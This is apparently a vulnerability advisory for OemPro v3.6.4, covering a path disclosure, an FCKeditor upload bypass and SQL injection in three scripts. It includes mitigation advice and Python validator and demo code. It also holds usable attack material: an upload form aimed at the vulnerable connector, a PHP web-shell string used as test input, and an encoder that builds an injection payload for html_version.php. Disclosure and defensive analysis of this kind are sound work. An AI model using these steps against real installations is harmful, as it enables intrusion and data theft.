Vendor: OemPro
By: Ignacio Garrido
CVSS: 7.5 (HIGH)
Vulnerability types: Path disclosure, File upload vulnerability, SQL Injection
CWE: 79, 434, 89 (as listed on the page; CWE-434 covers the upload issue and CWE-89 the SQL injections, while CWE-79 denotes cross-site scripting, which the advisory below does not describe)
Product Name: OemPro
Affected Version From: v3.6.4
Affected Version To: v3.6.4
Patch Exists: NO
Related CWE: N/A
CPE: a:octeth:oempro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows 2003
Year: 2011

Multiple vulnerabilities on OemPro

Multiple vulnerabilities have been found in OemPro v3.6.4 and probably in prior versions. A path disclosure exists in cli_bounce.php. The bundled FCKeditor 2.3.2 upload connector, fckeditor/editor/filemanager/upload/php/upload.php?Type=Media, lets an attacker bypass the restrictions placed on media file uploads, so a reachable connector can be used to plant a web shell; per the advisory, permission to create a folder under the upload path is required. SQL injections have been found in link.php, html_version.php and archive.php: the base64/URL-encoded request parameters are decoded and then concatenated into queries without any escaping.

Mitigation:

No vendor patch is listed for this version. Treat every decoded parameter as untrusted: decoding base64 or URL encoding is not filtering. In link.php, html_version.php and archive.php, pass the decoded value to the query as a bound parameter (or, at minimum, escape it with mysql_real_escape_string before concatenation). For the FCKeditor connector, remove the file manager under system/data/editors/fckeditor/editor/filemanager/ if it is not needed; otherwise require authentication, accept only an allow-list of extensions and content types, and store uploads where the web server will not execute scripts. For the path disclosure, turn off display_errors in production (log errors instead), and if cli_bounce.php is only meant to run from the command line, keep it out of the web root or deny HTTP access to it.

Exploit-DB raw data:

# Exploit title: Multiple vulnerabilities on OemPro
# Product: OemPro
# Version Affected: v3.6.4 and probably prior.
# Date: 03/02/2011
# Author: Ignacio Garrido
# Vendor: http://octeth.com
# Tested on: Linux - Windows 2003
# Mail: Ign.sec@gmail.com

# Path disclosure:
http://localhost/cli_bounce.php

# FCKEditor 2.3.2 is bundled; file upload vulnerabilities in it were found
before (credits to grabz), making it possible to bypass any restriction on
the kind of media file uploaded.
# A malicious user could exploit this flaw to upload a web shell. Permission
to create a folder under the upload path is needed, though.
# Vulnerable file:
http://localhost/system/data/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media
# Possible upload path:
http://localhost/system/data/user_uploads/Image/
http://localhost/user_uploads/image/

# Exploit:
<form enctype="multipart/form-data" action="http://localhost/system/data/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
<input name="NewFile" type="file">
<input type="submit" value="Upload">
</form>
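The check that the Type=Media connector above does not enforce, as an added example (not OemPro or FCKeditor code, and not the original advisory's): a server-side validator that keeps only the last path component of the client-supplied name, requires exactly one extension from an allow-list, and confirms the file's leading bytes match that extension. The allow-list, function names and sample submissions are assumptions made for illustration.

```python
# Added example (not OemPro or FCKeditor code): the allow-list check the
# Type=Media connector lacks. Names, the allow-list and the sample inputs are
# assumptions for illustration.
import os
import re
from typing import Optional

# Assumed allow-list: extension -> magic bytes the content must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def safe_upload_name(filename: str, head: bytes) -> Optional[str]:
    """Return the name to store under the upload directory, or None to reject.

    Rejects directory traversal in the client-supplied name, anything with
    more or fewer than exactly one extension (so shell.php, shell.php.jpg,
    shell.php;.jpg and shell.php\\x00.jpg all fail), extensions outside the
    allow-list, and content whose leading bytes do not match the extension.
    """
    # Keep only the last path component; the client controls the whole string.
    name = os.path.basename(filename.replace("\\", "/"))
    parts = name.lower().split(".")
    if len(parts) != 2:
        return None
    base, ext = parts
    if ext not in ALLOWED or not re.fullmatch(r"[a-z0-9_-]{1,64}", base):
        return None
    if not any(head.startswith(magic) for magic in ALLOWED[ext]):
        return None
    return f"{base}.{ext}"


# Constructed sample submissions: (client filename, first bytes of content).
SAMPLES = [
    ("shell.php", b"<?php system($_GET['c']); ?>"),
    ("shell.php.jpg", b"\xff\xd8\xff\xe0"),
    ("../../Image/cat.jpg", b"\xff\xd8\xff\xe0"),
    ("cat.jpg", b"<?php echo 1; ?>"),
    ("LOGO.PNG", b"\x89PNG\r\n\x1a\n\x00\x00"),
]


def classify_samples():
    """Map each sample filename to its stored name, or None if rejected."""
    return {fname: safe_upload_name(fname, head) for fname, head in SAMPLES}


if __name__ == "__main__":
    for fname, result in classify_samples().items():
        print(f"{fname!r:28} -> {'REJECT' if result is None else result}")
```

The magic-byte check catches a PHP file renamed to .jpg, but not a polyglot (a valid GIF that also carries PHP), so the upload directory must additionally be served without script execution, or sit outside the web root, for this check to be sufficient.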


# Several SQL injections have been found: the encoded input data is only
decoded, not filtered, before it is used in queries.
# A few examples:

# link.php, line 123 to 126
http://localhost/link.php?URL=[ENC URL]&Name=&EncryptedMemberID=[ENCODED SQLI]&CampaignID=9&CampaignStatisticsID=16&Demo=0&Email=[MAIL]

    // $MemberID is the decoded EncryptedMemberID, concatenated without escaping
    $SQLQuery = "SELECT * FROM ".$ArrayConfig['Database']['Prefix']."members WHERE MemberID='".$MemberID."'";
    $ResultSet = ExecuteMySQLQuery($SQLQuery);
    $ArrayMember = mysql_fetch_assoc($ResultSet);

# html_version.php, line 43 to 48
http://localhost/html_version.php?ECID=[SQL]

    $EncryptedCampaignID = ($_GET['ECID'] == '' ? $_POST['FormValue_ECID'] : $_GET['ECID']);

    if ($EncryptedCampaignID != '')
        {
        $CampaignID = base64_decode(rawurldecode($EncryptedCampaignID));   // decoded, never escaped
        $PublicDisplay = true;
        }

# archive.php
http://localhost/archive.php?ArchiveID=

    $ArchiveListID = ($_GET['ArchiveID'] == '' ? $_POST['FormValue_ArchiveID'] : $_GET['ArchiveID']);
    $ArchiveListID = base64_decode($ArchiveListID);   // decoded, never escaped

    $SQLQuery = "SELECT * FROM ".$ArrayConfig['Database']['Prefix']."archive_list WHERE ArchiveListID='".$ArchiveListID."'";
    $ResultSet = ExecuteMySQLQuery($SQLQuery);
    $ArrayArchive = mysql_fetch_assoc($ResultSet);
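The decode-then-concatenate pattern quoted from archive.php and html_version.php, reproduced as an added example (not OemPro's code, and not part of the original advisory) against an in-memory SQLite table with constructed rows, beside the parameterised query that closes the hole. It also builds the double-encoded ECID value html_version.php expects (base64, then percent-encoding, since the script runs base64_decode(rawurldecode(...))). The table prefix, column names and rows are assumptions; link.php is not reproduced because the page does not show how EncryptedMemberID is decoded.

```python
# Added example (not OemPro's code): reproduces the decode-then-concatenate
# pattern from archive.php and html_version.php against an in-memory SQLite
# table with constructed rows, and shows the parameterised query that closes
# the hole. Table prefix, columns and rows are assumptions.
import base64
import sqlite3
import urllib.parse

PREFIX = "oempro_"  # assumed stand-in for $ArrayConfig['Database']['Prefix']


def encode_ecid(value: str) -> str:
    """Build html_version.php?ECID=...: the script does
    base64_decode(rawurldecode($_GET['ECID'])), so base64-encode, then
    percent-encode (the inverse of rawurldecode) so '=' padding survives."""
    return urllib.parse.quote(base64.b64encode(value.encode()).decode(), safe="")


def decode_ecid(param: str) -> str:
    """What html_version.php does to ECID. Decoding is all that happens."""
    return base64.b64decode(urllib.parse.unquote(param)).decode(errors="replace")


def encode_archive_id(value: str) -> str:
    """archive.php only base64_decode()s ArchiveID, so plain base64 suffices."""
    return base64.b64encode(value.encode()).decode()


def decode_archive_id(param: str) -> str:
    """What archive.php does to ArchiveID before building the query."""
    return base64.b64decode(param).decode(errors="replace")


def vulnerable_query(archive_list_id: str) -> str:
    """String-built query exactly as archive.php composes $SQLQuery."""
    return ("SELECT * FROM " + PREFIX + "archive_list WHERE ArchiveListID='"
            + archive_list_id + "'")


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for <prefix>archive_list."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {PREFIX}archive_list (ArchiveListID TEXT, Name TEXT)")
    conn.executemany(
        f"INSERT INTO {PREFIX}archive_list VALUES (?, ?)",
        [("1", "Public newsletter"), ("2", "Internal list"), ("3", "Board updates")],
    )
    return conn


def fetch_vulnerable(conn: sqlite3.Connection, param: str):
    """archive.php as written: decode, then concatenate into the query."""
    return conn.execute(vulnerable_query(decode_archive_id(param))).fetchall()


def fetch_safe(conn: sqlite3.Connection, param: str):
    """Same decode, but the value travels as a bound parameter."""
    sql = f"SELECT * FROM {PREFIX}archive_list WHERE ArchiveListID=?"
    return conn.execute(sql, (decode_archive_id(param),)).fetchall()


PAYLOAD = "' OR '1'='1"  # closes the quoted literal and appends a tautology

if __name__ == "__main__":
    conn = make_db()
    print("legit ArchiveID=2      :", fetch_vulnerable(conn, encode_archive_id("2")))
    print("vulnerable, payload    :", fetch_vulnerable(conn, encode_archive_id(PAYLOAD)))
    print("parameterised, payload :", fetch_safe(conn, encode_archive_id(PAYLOAD)))
    print("ECID for payload       :", encode_ecid(PAYLOAD))
```

Like mysql_query(), sqlite3's execute() refuses stacked statements, so the example mirrors the real constraint: the attacker cannot append a second query, but a tautology inside the quoted literal turns the single-row lookup into a dump of every row, and a UNION in the same position would read other tables.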